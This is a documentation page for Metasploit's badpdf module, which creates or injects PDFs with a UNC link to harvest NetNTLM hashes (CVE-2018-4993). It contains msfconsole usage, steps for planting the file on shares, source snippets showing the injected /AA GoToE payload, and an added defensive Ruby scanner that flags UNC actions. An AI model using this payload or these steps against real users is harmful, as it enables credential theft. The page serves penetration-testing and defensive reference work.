BADPDF Malicious PDF Creator - Metasploit
This page contains detailed information about how to use the auxiliary/fileformat/badpdf Metasploit module. For a list of all Metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: BADPDF Malicious PDF Creator
Module: auxiliary/fileformat/badpdf
Source code: modules/auxiliary/fileformat/badpdf.rb
Disclosure date: -
Last modification time: 2019-01-09 14:30:24 +0000
Supported architecture(s): -
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2018-4993
This module can either create a blank PDF file containing a UNC link that can be used to capture NetNTLM credentials, or, if the PDFINJECT option is used, inject the necessary code into an existing PDF document where possible.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
msf > use auxiliary/fileformat/badpdf
msf auxiliary(badpdf) > show targets
... a list of targets ...
msf auxiliary(badpdf) > set TARGET target-id
msf auxiliary(badpdf) > show options
... show and set options ...
msf auxiliary(badpdf) > exploit
Required Options
- LHOST: Host listening for incoming SMB/WebDAV traffic
Knowledge Base
This module will either create a blank PDF document containing a UNC link that connects back to LHOST (when the FILENAME option is used), or, when the PDFINJECT option is used, attempt to inject the necessary UNC code into an existing PDF document.
Vulnerable Application
Various PDF readers. Note that Adobe released patch APSB18-09 to address this, and Foxit Reader after version 9.1 is no longer vulnerable.
Verification Steps
- Install the application
- Start msfconsole
- Do: use auxiliary/fileformat/badpdf
- Customise options as required
- Do: run
- A file pointing back to the listening host will then be generated.
- Configure auxiliary/server/capture/smb or similar to capture hashes.
- Upload the document to an open share or similar and wait for hashes.
Options
FILENAME: This option allows you to customise the generated filename. It can be changed using set FILENAME test.pdf
LHOST: This option allows you to set the IP address of the SMB listener that the document points to. It can be changed using set LHOST 192.168.1.25
PDFINJECT: This option allows you to inject the UNC code into an existing PDF document. It can be changed using set PDFINJECT /path/to/file/pdf.pdf
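The module's injected payload is an /AA open action whose /F file specification is a UNC path, with /S /GoToE as the action subtype. The following Ruby scanner is an added example for defenders, not part of the module or Metasploit: it decodes each /F string in a PDF (literal or hex-encoded) and reports those that resolve to a UNC path, together with the action subtype found in the same dictionary. It goes beyond the page by also covering /GoToR and /Launch, which take the same /F key, and the sample document it scans is constructed here.

```ruby
ACTION_RE = %r{/S\s*/(\w+)}

# Decode the body of a PDF literal string: \\ -> \, \( -> (, \n -> newline.
def unescape_pdf_literal(body)
  body.gsub(/\\(.)/m) do
    { 'n' => "\n", 'r' => "\r", 't' => "\t" }.fetch(Regexp.last_match(1), Regexp.last_match(1))
  end
end

# Decode the body of a PDF hex string (<5C5C...>); embedded whitespace is ignored.
def decode_pdf_hex(body)
  [body.delete(" \t\r\n")].pack('H*')
end

# Scan raw PDF bytes for /F file specifications that resolve to UNC paths.
# Returns an array of { path:, host:, action:, offset: } hashes.
def find_unc_actions(pdf_bytes)
  findings = []
  # Group 1: literal string body (escaped parens allowed); group 2: hex string body.
  re = %r{/F\s*(?:\(((?:\\.|[^\\)])*)\)|<([0-9A-Fa-f\s]*)>)}m
  pdf_bytes.to_enum(:scan, re).each do
    m = Regexp.last_match
    path = m[1] ? unescape_pdf_literal(m[1]) : decode_pdf_hex(m[2])
    next unless path.start_with?('\\\\')          # UNC path: \\host\share
    # Heuristic: the action subtype /S lives in the innermost dictionary
    # enclosing /F, so bound the search by the nearest << before and >> after.
    dict_start = pdf_bytes.rindex('<<', m.begin(0)) || 0
    dict_stop  = pdf_bytes.index('>>', m.end(0)) || pdf_bytes.length
    findings << { path: path,
                  host: path.split('\\')[2],
                  action: pdf_bytes[dict_start...dict_stop][ACTION_RE, 1],
                  offset: m.begin(0) }
  end
  findings
end

# Constructed sample (not a real document): a page whose open action points at a
# UNC path the way badpdf writes it, a benign local /GoToR, and a /Launch whose
# /F is hex-encoded so a plain grep for backslashes would miss it.
SAMPLE_PDF = "%PDF-1.4\n" \
  "1 0 obj\n<</Type /Page /AA <</O <</F (\\\\\\\\192.0.2.10\\\\test)/D [ 0 /Fit]/S /GoToE>>>> >>\nendobj\n" \
  "2 0 obj\n<</S /GoToR /F (appendix.pdf) /D [0 /Fit]>>\nendobj\n" \
  "3 0 obj\n<</S /Launch /F <5C5C756E632E6578616D706C655C7368617265>>>\nendobj\n"

if __FILE__ == $PROGRAM_NAME
  find_unc_actions(SAMPLE_PDF).each do |f|
    puts "UNC action at offset #{f[:offset]}: /S /#{f[:action]} -> #{f[:path]} (host #{f[:host]})"
  end
end
```

The scanner works on the raw bytes only, so content inside compressed object streams is not inspected; decompress those first (for example with a PDF library) before scanning.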
Scenarios
Microsoft Windows
Console output
msf auxiliary(fileformat/badpdf) > show info
Name: BADPDF Malicious PDF Creator
Module: auxiliary/fileformat/badpdf
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
Richard Davy - secureyourit.co.uk
CheckPoint researchers - Assaf Baharav, Yaron Fruchtmann, Ido Solomon
Basic options:
Name       Current Setting  Required  Description
----       ---------------  --------  -----------
FILENAME                    no        Filename
LHOST                       yes       Host listening for incoming SMB/WebDAV traffic
PDFINJECT                   no        Path and filename to existing PDF to inject UNC link code into
Description:
This module can either creates a blank PDF file which contains a UNC
link which can be used to capture NetNTLM credentials, or if the
PDFINJECT option is used it will inject the necessary code into an
existing PDF document if possible.
References:
https://cvedetails.com/cve/CVE-2018-4993/
https://research.checkpoint.com/ntlm-credentials-theft-via-pdf-files/
msf auxiliary(fileformat/badpdf) >
msf auxiliary(fileformat/badpdf) > set filename test.pdf
filename => test.pdf
msf auxiliary(fileformat/badpdf) > set lhost 192.168.1.28
lhost => 192.168.1.28
msf auxiliary(fileformat/badpdf) > exploit
[+] test.pdf stored at /root/.msf4/local/test.pdf
[*] Auxiliary module execution completed
msf auxiliary(fileformat/badpdf) > set filename ""
filename =>
msf auxiliary(fileformat/badpdf) > set pdfinject /root/Desktop/example.pdf
pdfinject => /root/Desktop/example.pdf
msf auxiliary(fileformat/badpdf) > exploit
[+] Malicious file writen to /root/Desktop/example_malicious.pdf
[*] Auxiliary module execution completed
msf auxiliary(fileformat/badpdf) >
Msfconsole Usage
Here is how the fileformat/badpdf auxiliary module looks in the msfconsole:
msf6 > use auxiliary/fileformat/badpdf
msf6 auxiliary(fileformat/badpdf) > show info
Name: BADPDF Malicious PDF Creator
Module: auxiliary/fileformat/badpdf
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
Assaf Baharav
Yaron Fruchtmann
Ido Solomon
Richard Davy - secureyourit.co.uk
Check supported:
No
Basic options:
Name       Current Setting  Required  Description
----       ---------------  --------  -----------
FILENAME                    no        Filename
LHOST                       yes       Host listening for incoming SMB/WebDAV traffic
PDFINJECT                   no        Path and filename to existing PDF to inject UNC link code into
Description:
This module can either creates a blank PDF file which contains a UNC
link which can be used to capture NetNTLM credentials, or if the
PDFINJECT option is used it will inject the necessary code into an
existing PDF document if possible.
References:
https://nvd.nist.gov/vuln/detail/CVE-2018-4993
https://research.checkpoint.com/ntlm-credentials-theft-via-pdf-files/
Module Options
This is a complete list of options available in the fileformat/badpdf auxiliary module:
msf6 auxiliary(fileformat/badpdf) > show options
Module options (auxiliary/fileformat/badpdf):
Name       Current Setting  Required  Description
----       ---------------  --------  -----------
FILENAME                    no        Filename
LHOST                       yes       Host listening for incoming SMB/WebDAV traffic
PDFINJECT                   no        Path and filename to existing PDF to inject UNC link code into
Advanced Options
Here is a complete list of advanced options supported by the fileformat/badpdf auxiliary module:
msf6 auxiliary(fileformat/badpdf) > show advanced
Module advanced options (auxiliary/fileformat/badpdf):
Name                   Current Setting  Required  Description
----                   ---------------  --------  -----------
DisablePayloadHandler  true             no        Disable the handler code for the selected payload
VERBOSE                false            no        Enable detailed status messages
WORKSPACE                               no        Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the fileformat/badpdf module can do:
msf6 auxiliary(fileformat/badpdf) > show actions
Auxiliary actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the fileformat/badpdf auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(fileformat/badpdf) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Error Messages
This module may fail with the following error messages:
Check for the possible causes in the code snippets below, taken from the module source code. This can often help in identifying the root cause of the problem.
Please configure either FILENAME or PDFINJECT
Here is a relevant code snippet related to the "Please configure either FILENAME or PDFINJECT" error message:
  )
end

def run
  if datastore['PDFINJECT'].nil? && datastore['FILENAME'].nil?
    print_error 'Please configure either FILENAME or PDFINJECT'
  elsif !datastore['PDFINJECT'].nil? && datastore['PDFINJECT'].to_s.end_with?('.pdf')
    injectpdf
  elsif !datastore['FILENAME'].nil? && datastore['FILENAME'].to_s.end_with?('.pdf')
    createpdf
  else
FILENAME or PDFINJECT must end with '.pdf' file extension
Here is a relevant code snippet related to the "FILENAME or PDFINJECT must end with '.pdf' file extension" error message:
  elsif !datastore['PDFINJECT'].nil? && datastore['PDFINJECT'].to_s.end_with?('.pdf')
    injectpdf
  elsif !datastore['FILENAME'].nil? && datastore['FILENAME'].to_s.end_with?('.pdf')
    createpdf
  else
    print_error "FILENAME or PDFINJECT must end with '.pdf' file extension"
  end
end

def injectpdf
  # Payload which gets injected
File doesn't exist <PDFINJECT>
Here is a relevant code snippet related to the "File doesn't exist <PDFINJECT>" error message:
  inject_payload = "/AA <</O <</F (\\\\\\\\#{datastore['LHOST']}\\\\test)/D [ 0 /Fit]/S /GoToE>>>>"

  # if given path doesn't exist display error and return
  unless File.exist?(datastore['PDFINJECT'])
    # If file not found display error message
    print_error "File doesn't exist #{datastore['PDFINJECT']}"
    return
  end

  # Read in contents of file
  content = File.read(datastore['PDFINJECT'])
Could not find placeholder to poison file this time....
Here is a relevant code snippet related to the "Could not find placeholder to poison file this time...." error message:
    end
  end

  # Display error message if we couldn't poison the file
  if newdata.empty?
    print_error 'Could not find placeholder to poison file this time....'
    return
  end

  # Create new filename by replacing .pdf with _malicious.pdf
  newfilename = "#{datastore['PDFINJECT'].gsub(/\.pdf$/, '')}_malicious.pdf"
Something went wrong creating malicious PDF file
Here is a relevant code snippet related to the "Something went wrong creating malicious PDF file" error message:
  File.open(newfilename, 'wb') { |file| file.write(newdata) }
  # Check file exists and display path or error message
  if File.exist?(newfilename)
    print_good("Malicious file writen to: #{newfilename}")
  else
    print_error 'Something went wrong creating malicious PDF file'
  end
end

def createpdf
  # Code below taken POC provided by CheckPoint Research
Related Pull Requests
- #11217 Merged Pull Request: auxiliary/fileformat/badpdf: fix syntax and logic error in options handling
- #10148 Merged Pull Request: Add New Module - Badpdf
- #10157 Merged Pull Request: Multidrop Module Code Improvement
Authors
- Assaf Baharav
- Yaron Fruchtmann
- Ido Solomon
- Richard Davy - secureyourit.co.uk
Version
This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.